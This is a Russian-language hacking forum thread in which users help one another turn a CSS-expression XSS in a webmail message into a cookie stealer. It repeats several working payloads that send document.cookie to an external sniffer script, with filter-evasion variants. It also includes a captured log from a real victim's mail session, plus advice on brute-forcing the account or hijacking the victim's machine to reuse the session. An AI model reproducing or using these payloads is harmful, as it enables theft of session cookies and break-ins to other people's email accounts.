привет если я отправил на одно мыло с :
<hr style=top:expression(alert(19))>
<span style=top:expression(alert(20))></span>

и он выдал алерт 19 и 20
тепер как мона использоват эти щтучки чтоб пасс писался на antichat.ru/sniff/log
что я должен написат в писме?
прощу поясней
ЗАРАНЕЕ БЛОГОДАРЕН

вместо alert(19) или alert(20) тогда это:
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

или так
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Если не прокатит, попробуй пробелы заменить на комментарий:
<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

вместо alert(19) или alert(20) тогда это:


или так


Если не прокатит, попробуй пробелы заменить на комментарий:
<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>



СПАСИБО !!!!

РАБОТАЕТ ТОЛЬКО В Ie!!!

РАБОТАЕТ ТОЛЬКО В Ie!!!

<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Это на сколько я знаю в опере тож!

<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Это на сколько я знаю в опере тож!

ЧЕ??! Я имею ввиду, что:
<hr style=top:expression(alert(19))>
<span style=top:expression(alert(20))></span>
Работает только в IE...

С этим не поспоришь))))

вместо alert(19) или alert(20) тогда это:


или так


Если не прокатит, попробуй пробелы заменить на комментарий:
<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>


НЕСРАБОТАЛ!!!!!!!!

1) <hr style=top:expression(img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;)>

2)<hr style=top:expression(<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>)>


один невидим но логи не приходят!!!
а другой виден значет не работает!!

так работает :

<hr style=`top:expression(img=new Image()\;img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`>

так работает :

<hr style=`top:expression(img=new Image()\;img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`>



спасибо !!! проверим

<hr style=top:expression(alert(19))>
<span style=top:expression(alert(20))></span>

Сразу видно человек пользовался прогой XSS Tester от LittleLamer =) Дельная прога, очень хотелось бы увидеть новую версию с новыми конструкциями xss вставок. А если человек о ней узнал, то это означает что он прочитал Небольшой faq Майора. Дедукция .. =)

авот что мне пришло я что то тут не вижу хеш пароля что мне делать?как мне зайти на почту жертвы


Date: [Sat|15/10/2005|18:02] || IP: 85.132.6.xxx Real IP(if use proxy):()
QUERY:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
REFERER:http://mail.rambler.ru/Session/5068672-V8YFV0CTV7WP1tyIC3mn-ekmoqpv/Message.wssp?Mailbox=INBOX&MSG=111

Не уверен, но по-моему на сегодняшний день способов взлома rambler.ru нету. Куки для авторизации данный сервис не использует, сессия строго привязывается к ip-адресу. Что остаётся? Брут. Я не пробовал данный сервис на брутабельность.

Вот если включить фантазию, то получается что у тебя есть ip жертвы... Значит если у него бажная ОС, то в теории можно управлять клмпом удаленно.. Если это получается, то надо ставить на машину жертвы прокси-сервер и лезть с отснифанной сессией и его айпишником.. Тока если так =) Далее начинается Unreal Tournament...

Так... Что-то я кинулся рамблер смотреть... Xss не проходит.. Куки для аутентификации всё-таки используются. Привязку к айпи проверить не получилось. А какую Xss используете?